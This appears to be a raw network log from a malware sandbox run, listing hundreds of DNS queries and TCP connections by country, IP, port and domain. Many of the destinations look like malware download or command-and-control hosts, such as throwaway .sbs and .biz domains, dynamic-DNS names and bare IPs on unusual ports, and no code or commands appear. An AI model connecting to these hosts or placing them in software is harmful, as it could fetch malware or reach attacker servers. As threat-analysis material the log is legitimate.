FR 99.86.91.59:443 irp.cdn-website.com tcp
US 8.8.8.8:53 dctdownload.s3.amazonaws.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 cdn-downloads-now.xyz udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 csg-app.com udp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 67.23.237.28:80 3434.filelu.cloud tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
IE 52.92.1.41:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.20.105:443 dctdownload.s3.amazonaws.com tcp
US 198.54.115.214:443 kolobrownsalesye-fong.com tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
US 8.8.8.8:53 a15aaa1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 src1.minibai.com udp
US 8.8.8.8:53 monastery.mlnk.net udp
US 144.34.162.13:80 144.34.162.13 tcp
US 166.150.43.236:80 166.150.43.236 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
ES 47.62.190.226:80 47.62.190.226 tcp
CN 101.35.228.105:8888 tcp
CN 150.158.25.244:9000 tcp
HK 43.132.13.252:9000 43.132.13.252 tcp
CN 122.51.183.116:1234 tcp
LK 192.248.13.186:80 192.248.13.186 tcp
CN 101.71.255.146:8195 tcp
US 8.8.8.8:53 perfectperu.com udp
US 8.8.8.8:53 dz0nhlj1q8ac3.cloudfront.net udp
NL 4.180.120.64:8000 4.180.120.64 tcp
IE 52.92.20.105:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 hnjgdl.geps.glodon.com udp
IE 52.218.101.122:443 dctdownload.s3.amazonaws.com tcp
CN 61.131.3.86:9991 tcp
CN 39.108.237.194:80 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 100.201.169.95.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 119.117.12.49.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 59.91.86.99.in-addr.arpa udp
US 8.8.8.8:53 132.249.42.81.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 138.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 61.238.158.216.in-addr.arpa udp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 41.1.92.52.in-addr.arpa udp
US 8.8.8.8:53 105.20.92.52.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 66.227.165.66.in-addr.arpa udp
US 8.8.8.8:53 28.237.23.67.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 214.115.54.198.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 4.44.0.136.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 13.162.34.144.in-addr.arpa udp
US 8.8.8.8:53 64.120.180.4.in-addr.arpa udp
US 8.8.8.8:53 122.101.218.52.in-addr.arpa udp
BG 88.213.212.10:80 monastery.mlnk.net tcp
DE 38.242.241.140:80 tcp
CN 113.219.177.95:8087 tcp
US 50.116.92.169:443 csg-app.com tcp
HK 47.79.66.210:80 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
CA 184.145.33.5:80 184.145.33.5 tcp
US 8.8.8.8:53 sfa.com.ar udp
US 8.8.8.8:53 d.kpzip.com udp
CN 59.110.104.183:8888 hnjgdl.geps.glodon.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
IE 52.218.37.1:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.101.122:443 dctdownload.s3.amazonaws.com tcp
CN 119.91.25.19:8888 tcp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 10.212.213.88.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 186.13.248.192.in-addr.arpa udp
US 8.8.8.8:53 169.92.116.50.in-addr.arpa udp
US 8.8.8.8:53 210.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 137.118.56.146.in-addr.arpa udp
US 8.8.8.8:53 236.43.150.166.in-addr.arpa udp
US 8.8.8.8:53 252.13.132.43.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
NL 194.26.192.76:8080 194.26.192.76 tcp
US 67.213.59.251:80 67.213.59.251 tcp
US 190.61.250.130:80 sfa.com.ar tcp
CN 36.250.242.248:80 d.kpzip.com tcp
DO 181.36.153.151:81 181.36.153.151 tcp
CN 211.91.65.232:80 src1.minibai.com tcp
IN 103.117.156.102:80 103.117.156.102 tcp
CN 112.124.28.233:5566 tcp
FR 52.222.153.187:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 8.8.8.8:53 twizthash.net udp
HK 103.43.18.71:88 103.43.18.71 tcp
AR 200.58.120.6:80 perfectperu.com tcp
NL 203.161.45.11:443 cdn-downloads-now.xyz tcp
US 8.8.8.8:53 76.192.26.194.in-addr.arpa udp
US 8.8.8.8:53 251.59.213.67.in-addr.arpa udp
US 8.8.8.8:53 130.250.61.190.in-addr.arpa udp
US 8.8.8.8:53 187.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 1.37.218.52.in-addr.arpa udp
RU 195.46.176.2:80 195.46.176.2 tcp
RU 176.111.174.138:443 tcp
IE 52.218.108.50:443 dctdownload.s3.amazonaws.com tcp
IE 52.218.37.1:443 dctdownload.s3.amazonaws.com tcp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 151.153.36.181.in-addr.arpa udp
US 8.8.8.8:53 102.156.117.103.in-addr.arpa udp
US 8.8.8.8:53 71.18.43.103.in-addr.arpa udp
US 8.8.8.8:53 125.93.155.43.in-addr.arpa udp
US 8.8.8.8:53 6.120.58.200.in-addr.arpa udp
US 8.8.8.8:53 2.176.46.195.in-addr.arpa udp
US 8.8.8.8:53 50.108.218.52.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 20.83.148.22:8080 20.83.148.22 tcp
FR 52.222.153.24:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 8.8.8.8:53 hallowed-noisy.sbs udp
US 8.8.8.8:53 plastic-mitten.sbs udp
US 8.8.8.8:53 looky-marked.sbs udp
US 8.8.8.8:53 wrench-creter.sbs udp
US 8.8.8.8:53 slam-whipp.sbs udp
US 8.8.8.8:53 record-envyp.sbs udp
US 8.8.8.8:53 copper-replace.sbs udp
BG 130.185.193.208:8080 130.185.193.208 tcp
TH 154.197.69.165:443 tcp
US 8.8.8.8:53 savvy-steereo.sbs udp
US 8.8.8.8:53 226.190.62.47.in-addr.arpa udp
US 8.8.8.8:53 24.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 preside-comforter.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 www.saf-oil.ru udp
IE 52.218.108.50:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.35.81:443 dctdownload.s3.amazonaws.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 13.58.157.220:10640 tcp
US 8.8.8.8:53 208.193.185.130.in-addr.arpa udp
US 8.8.8.8:53 165.69.197.154.in-addr.arpa udp
US 8.8.8.8:53 81.35.92.52.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 shell.dimitrimedia.com udp
FR 52.222.153.112:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 144.34.162.13:3333 tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 144.172.71.105:1338 144.172.71.105 tcp
RU 87.236.16.222:443 www.saf-oil.ru tcp
CN 101.126.11.168:80 tcp
CN 120.25.163.165:8080 tcp
IE 52.92.0.153:443 dctdownload.s3.amazonaws.com tcp
IE 52.92.35.81:443 dctdownload.s3.amazonaws.com tcp
CN 123.132.224.187:14417 tcp
DE 172.105.66.118:80 shell.dimitrimedia.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
RU 176.113.115.37:80 176.113.115.37 tcp
FR 52.222.153.25:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 24.93.22.147:8081 24.93.22.147 tcp
IE 52.92.0.153:443 dctdownload.s3.amazonaws.com tcp
IE 3.5.64.4:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 unicorpbrunei.com udp
DE 172.105.66.118:8080 shell.dimitrimedia.com tcp
KW 178.61.160.6:5001 178.61.160.6 tcp
US 8.8.8.8:53 rddissisifigifidi.net udp
US 8.8.8.8:53 112.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 153.0.92.52.in-addr.arpa udp
US 8.8.8.8:53 118.66.105.172.in-addr.arpa udp
US 8.8.8.8:53 222.16.236.87.in-addr.arpa udp
US 8.8.8.8:53 105.71.172.144.in-addr.arpa udp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 37.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 25.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 4.64.5.3.in-addr.arpa udp
US 8.8.8.8:53 147.22.93.24.in-addr.arpa udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
IE 52.92.1.41:443 dctdownload.s3.amazonaws.com tcp
US 8.8.8.8:53 defgyma.com udp
IE 3.5.64.4:443 dctdownload.s3.amazonaws.com tcp
IN 103.14.122.111:80 unicorpbrunei.com tcp
US 8.8.8.8:53 ldcdn.ldmnq.com udp
US 8.8.8.8:53 a12xxx1.oss-cn-hongkong.aliyuncs.com udp
HK 156.245.12.220:8000 156.245.12.220 tcp
GB 163.181.154.238:443 ldcdn.ldmnq.com tcp
HK 47.79.66.205:80 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
CN 124.70.140.100:80 tcp
AZ 185.18.245.58:80 defgyma.com tcp
US 8.8.8.8:53 6.160.61.178.in-addr.arpa udp
US 8.8.8.8:53 111.122.14.103.in-addr.arpa udp
US 8.8.8.8:53 a19ccc1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 220.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 238.154.181.163.in-addr.arpa udp
US 8.8.8.8:53 205.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 58.245.18.185.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
DE 136.243.104.235:443 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 8.8.8.8:53 kiemthehuyenlong.com udp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
N/A 255.255.255.255:9999 udp
HK 47.79.66.211:80 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
US 8.8.8.8:53 cfs7.blog.daum.net udp
US 8.8.8.8:53 www.xn--on3b15m2lco2u.com udp
US 8.8.8.8:53 33.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 adf6.adf6.com udp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
VN 103.163.214.66:80 kiemthehuyenlong.com tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
RU 176.111.174.138:443 tcp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 211.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
US 8.8.8.8:53 66.214.163.103.in-addr.arpa udp
US 8.8.8.8:53 57.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 187.212.67.152.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.21.67.89:80 adf6.adf6.com tcp
KR 221.139.49.8:80 www.xn--on3b15m2lco2u.com tcp
US 8.8.8.8:53 down.qqfarmer.com.cn udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 89.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 8.49.139.221.in-addr.arpa udp
US 8.8.8.8:53 week-dictionary.gl.at.ply.gg udp
US 8.8.8.8:53 dare-curbys.biz udp
US 172.67.181.44:443 dare-curbys.biz tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 8.8.8.8:53 www.netsolution.it udp
US 8.8.8.8:53 goodlabel.cn udp
BR 187.59.102.238:9090 187.59.102.238 tcp
KR 121.53.218.30:80 cfs7.blog.daum.net tcp
CN 123.60.59.48:80 tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
RS 79.101.0.33:80 79.101.0.33 tcp
US 8.8.8.8:53 post-to-me.com udp
US 8.8.8.8:53 44.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 30.218.53.121.in-addr.arpa udp
CN 58.218.215.167:80 down.qqfarmer.com.cn tcp
US 104.21.56.70:443 post-to-me.com tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 33.0.101.79.in-addr.arpa udp
RU 176.111.174.138:443 tcp
RU 176.111.174.140:443 tcp
US 8.8.8.8:53 se-blurry.biz udp
IL 195.60.232.6:100 195.60.232.6 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
US 8.8.8.8:53 dow.andylab.cn udp
US 172.67.162.65:443 se-blurry.biz tcp
IT 185.81.0.56:80 www.netsolution.it tcp
CN 175.27.229.2:80 goodlabel.cn tcp
HK 134.122.129.18:80 134.122.129.18 tcp
CN 61.182.69.190:11111 tcp
SE 94.255.218.185:80 94.255.218.185 tcp
US 170.55.7.234:80 170.55.7.234 tcp
CN 122.51.183.116:443 tcp
ID 103.123.98.86:8082 103.123.98.86 tcp
CN 139.159.155.204:81 tcp
JP 111.217.175.54:80 111.217.175.54 tcp
US 8.8.8.8:53 ad.adf6.com udp
US 192.74.234.120:80 ad.adf6.com tcp
CN 116.131.57.65:80 dow.andylab.cn tcp
KR 112.217.207.130:80 112.217.207.130 tcp
ES 217.125.11.90:8080 217.125.11.90 tcp
US 8.8.8.8:53 host-95-255-114-11.business.telecomitalia.it udp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
DE 217.92.214.15:8088 217.92.214.15 tcp
US 8.8.8.8:53 70.56.21.104.in-addr.arpa udp
US 8.8.8.8:53 140.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 65.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 6.232.60.195.in-addr.arpa udp
US 8.8.8.8:53 56.0.81.185.in-addr.arpa udp
US 8.8.8.8:53 155.49.250.167.in-addr.arpa udp
US 8.8.8.8:53 185.218.255.94.in-addr.arpa udp
US 8.8.8.8:53 18.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 234.7.55.170.in-addr.arpa udp
US 8.8.8.8:53 86.98.123.103.in-addr.arpa udp
US 8.8.8.8:53 120.234.74.192.in-addr.arpa udp
US 8.8.8.8:53 90.11.125.217.in-addr.arpa udp
US 8.8.8.8:53 11.114.255.95.in-addr.arpa udp
US 8.8.8.8:53 130.207.217.112.in-addr.arpa udp
US 8.8.8.8:53 15.214.92.217.in-addr.arpa udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 54.175.217.111.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 167.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.maan2u.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
MY 103.82.231.117:443 www.maan2u.com tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 172.67.162.65:443 se-blurry.biz tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 96.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 117.231.82.103.in-addr.arpa udp
KR 152.67.212.187:443 tcp
MY 103.82.231.117:443 www.maan2u.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 antivirus-helper.publicvm.com udp
US 8.8.8.8:53 mohibkal.publicvm.com udp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 formy-spill.biz udp
DE 136.243.111.71:741 antivirus-helper.publicvm.com tcp
US 104.21.96.55:443 formy-spill.biz tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 8.8.8.8:53 71.111.243.136.in-addr.arpa udp
US 8.8.8.8:53 55.96.21.104.in-addr.arpa udp
NL 81.161.238.172:8705 tcp
CN 116.169.181.197:80 d.kpzip.com tcp
CN 202.97.231.78:80 src1.minibai.com tcp
US 8.8.8.8:53 soportegira.net udp
US 8.8.8.8:53 123.ywxww.net udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 download.suxiazai.com udp
US 8.8.8.8:53 funletters.net udp
US 8.8.8.8:53 jtpdev.co.uk udp
US 8.8.8.8:53 cfs10.blog.daum.net udp
US 8.8.8.8:53 down10d.zol.com.cn udp
US 8.8.8.8:53 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev udp
US 8.8.8.8:53 cfs5.tistory.com udp
US 8.8.8.8:53 eoufaoeuhoauengi.su udp
US 8.8.8.8:53 cdn.ly.9377.com udp
US 8.8.8.8:53 data.discuz.mobi udp
US 8.8.8.8:53 a23uuu1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 cat.xiaoshabi.nl udp
RU 185.215.113.36:80 185.215.113.36 tcp
CN 114.55.106.136:80 tcp
ES 94.76.156.101:280 94.76.156.101 tcp
KR 218.147.147.172:80 218.147.147.172 tcp
CN 47.104.173.216:8082 tcp
CN 39.103.217.92:80 tcp
DE 172.105.66.118:80 shell.dimitrimedia.com tcp
RU 89.175.186.155:80 89.175.186.155 tcp
SG 168.138.162.78:80 168.138.162.78 tcp
CN 47.104.173.216:8082 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
US 172.67.206.64:443 covery-mover.biz tcp
CN 8.134.12.90:80 tcp
RU 77.72.254.210:17017 77.72.254.210 tcp
DO 181.36.153.151:80 181.36.153.151 tcp
CN 60.29.43.10:8072 tcp
CN 222.244.110.238:8089 tcp
AU 80.249.6.118:8084 80.249.6.118 tcp
VN 113.160.158.236:80 113.160.158.236 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
CN 47.120.46.210:80 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
CN 112.27.189.32:8090 tcp
US 172.67.153.96:443 dwell-exclaim.biz tcp
RU 176.111.174.138:443 tcp
US 98.109.126.66:41798 98.109.126.66 tcp
CN 121.40.100.23:12616 tcp
CN 115.28.26.10:8080 tcp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 101.156.76.94.in-addr.arpa udp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 155.186.175.89.in-addr.arpa udp
US 8.8.8.8:53 210.254.72.77.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 236.158.160.113.in-addr.arpa udp
US 8.8.8.8:53 78.162.138.168.in-addr.arpa udp
US 8.8.8.8:53 118.6.249.80.in-addr.arpa udp
US 8.8.8.8:53 172.147.147.218.in-addr.arpa udp
GB 91.238.160.241:443 jtpdev.co.uk tcp
ES 83.175.202.178:80 soportegira.net tcp
US 162.159.140.237:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
US 208.122.221.162:80 funletters.net tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
GB 79.133.176.219:80 cdn.ly.9377.com tcp
CN 60.191.208.187:820 123.ywxww.net tcp
CN 122.143.2.98:80 down10d.zol.com.cn tcp
KR 211.231.99.68:80 cfs5.tistory.com tcp
US 8.8.8.8:53 139520.aioc.qbgxl.com udp
US 20.83.148.22:80 tcp
CN 125.33.229.165:8085 tcp
US 65.75.209.59:80 cat.xiaoshabi.nl tcp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
CN 121.4.173.197:443 data.discuz.mobi tcp
KR 121.53.201.236:80 cfs5.tistory.com tcp
RU 92.127.156.174:8880 92.127.156.174 tcp
CN 117.161.176.120:80 download.suxiazai.com tcp
HK 45.15.9.44:80 45.15.9.44 tcp
DE 172.105.66.118:8080 shell.dimitrimedia.com tcp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 66.126.109.98.in-addr.arpa udp
US 8.8.8.8:53 237.140.159.162.in-addr.arpa udp
US 8.8.8.8:53 241.160.238.91.in-addr.arpa udp
US 8.8.8.8:53 219.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 178.202.175.83.in-addr.arpa udp
US 8.8.8.8:53 162.221.122.208.in-addr.arpa udp
US 8.8.8.8:53 68.99.231.211.in-addr.arpa udp
US 8.8.8.8:53 174.156.127.92.in-addr.arpa udp
US 8.8.8.8:53 59.209.75.65.in-addr.arpa udp
US 8.8.8.8:53 236.201.53.121.in-addr.arpa udp
US 8.8.8.8:53 44.9.15.45.in-addr.arpa udp
SE 185.130.45.176:80 185.130.45.176 tcp
US 8.8.8.8:53 update.vlnguba.com udp
US 104.21.96.55:443 formy-spill.biz tcp
CN 180.167.115.186:8011 tcp
CN 61.160.195.64:80 139520.aioc.qbgxl.com tcp
CN 203.2.65.29:8088 tcp
US 8.8.8.8:53 media.githubusercontent.com udp
US 8.8.8.8:53 paonancs.cn udp
CN 121.40.100.23:12616 tcp
US 8.8.8.8:53 176.45.130.185.in-addr.arpa udp
PK 116.58.62.74:80 116.58.62.74 tcp
VN 103.145.254.62:80 update.vlnguba.com tcp
US 209.141.35.225:80 209.141.35.225 tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 8.8.8.8:53 225.35.141.209.in-addr.arpa udp
US 8.8.8.8:53 74.62.58.116.in-addr.arpa udp
US 8.8.8.8:53 62.254.145.103.in-addr.arpa udp
US 8.8.8.8:53 download.haozip.com udp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
US 8.8.8.8:53 246.35.21.104.in-addr.arpa udp
PT 188.250.120.10:80 188.250.120.10 tcp
IN 122.170.110.131:9105 122.170.110.131 tcp
US 8.8.8.8:53 file.blackint3.com udp
CN 58.218.215.160:80 down.qqfarmer.com.cn tcp
MA 102.53.15.54:80 102.53.15.54 tcp
US 185.199.108.133:443 media.githubusercontent.com tcp
KR 125.186.91.61:80 125.186.91.61 tcp
US 16.182.71.185:443 bbuseruploads.s3.amazonaws.com tcp
US 38.148.246.248:80 paonancs.cn tcp
RU 176.113.115.37:80 176.113.115.37 tcp
RU 176.111.174.138:443 tcp
CN 61.170.80.227:80 download.haozip.com tcp
RU 87.251.102.94:80 87.251.102.94 tcp
US 8.8.8.8:53 360down7.miiyun.cn udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 10.120.250.188.in-addr.arpa udp
US 8.8.8.8:53 54.15.53.102.in-addr.arpa udp
US 8.8.8.8:53 185.71.182.16.in-addr.arpa udp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 8.8.8.8:53 248.246.148.38.in-addr.arpa udp
US 8.8.8.8:53 61.91.186.125.in-addr.arpa udp
US 8.8.8.8:53 94.102.251.87.in-addr.arpa udp
US 103.130.147.211:80 103.130.147.211 tcp
CN 117.50.194.20:80 tcp
CN 101.200.220.118:8090 tcp
US 8.8.8.8:53 pb.agnt.ru udp
US 8.8.8.8:53 impend-differ.biz udp
DE 188.245.87.202:443 tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.181.44:443 dare-curbys.biz tcp
US 8.8.8.8:53 211.147.130.103.in-addr.arpa udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 utorrent-backup-server4.top udp
CN 182.149.206.216:88 file.blackint3.com tcp
US 8.8.8.8:53 znrq.zifwxq.cn udp
RU 185.215.113.36:80 185.215.113.36 tcp
CN 123.6.40.248:80 dow.andylab.cn tcp
US 54.231.233.161:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link udp
CN 218.12.76.159:80 znrq.zifwxq.cn tcp
CN 121.43.104.75:81 tcp
HK 219.73.22.64:8084 219.73.22.64 tcp
RU 45.90.34.133:443 pb.agnt.ru tcp
ES 178.156.109.69:81 178.156.109.69 tcp
US 8.8.8.8:53 69.109.156.178.in-addr.arpa udp
US 8.8.8.8:53 133.34.90.45.in-addr.arpa udp
US 8.8.8.8:53 161.233.231.54.in-addr.arpa udp
TH 58.137.135.190:8080 58.137.135.190 tcp
US 104.21.35.246:443 print-vexer.biz tcp
BG 87.121.86.16:80 utorrent-backup-server4.top tcp
US 24.252.169.236:80 24.252.169.236 tcp
RU 176.111.174.138:8000 176.111.174.138 tcp
US 8.8.8.8:53 karoonpc.com udp
RU 92.255.57.88:80 92.255.57.88 tcp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 190.135.137.58.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 64.22.73.219.in-addr.arpa udp
US 8.8.8.8:53 88.57.255.92.in-addr.arpa udp
CN 120.52.95.246:80 znrq.zifwxq.cn tcp
US 8.8.8.8:53 sirault.be udp
MX 187.225.233.208:80 187.225.233.208 tcp
US 209.94.90.2:443 bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link tcp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 client.9377.com udp
US 8.8.8.8:53 impend-differ.biz udp
CN 120.79.30.240:80 client.9377.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 www.beiletoys.com udp
US 8.8.8.8:53 2.90.94.209.in-addr.arpa udp
CN 139.198.15.223:8080 tcp
IR 217.172.98.87:80 karoonpc.com tcp
IN 43.240.65.55:81 43.240.65.55 tcp
US 52.217.169.73:443 bbuseruploads.s3.amazonaws.com tcp
AT 81.10.240.105:80 81.10.240.105 tcp
FR 185.98.131.200:443 sirault.be tcp
IN 116.206.151.203:478 116.206.151.203 tcp
ES 178.60.25.240:80 178.60.25.240 tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 73.169.217.52.in-addr.arpa udp
US 8.8.8.8:53 87.98.172.217.in-addr.arpa udp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 8.8.8.8:53 200.131.98.185.in-addr.arpa udp
US 8.8.8.8:53 105.240.10.81.in-addr.arpa udp
US 8.8.8.8:53 240.25.60.178.in-addr.arpa udp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
BR 189.61.50.98:8080 189.61.50.98 tcp
CN 120.77.253.240:80 tcp
US 8.8.8.8:53 deauduafzgezzfgm.top udp
CN 121.40.155.21:80 www.beiletoys.com tcp
US 158.101.35.62:9000 158.101.35.62 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
BG 87.120.113.235:80 tcp
US 8.8.8.8:53 cd.textfiles.com udp
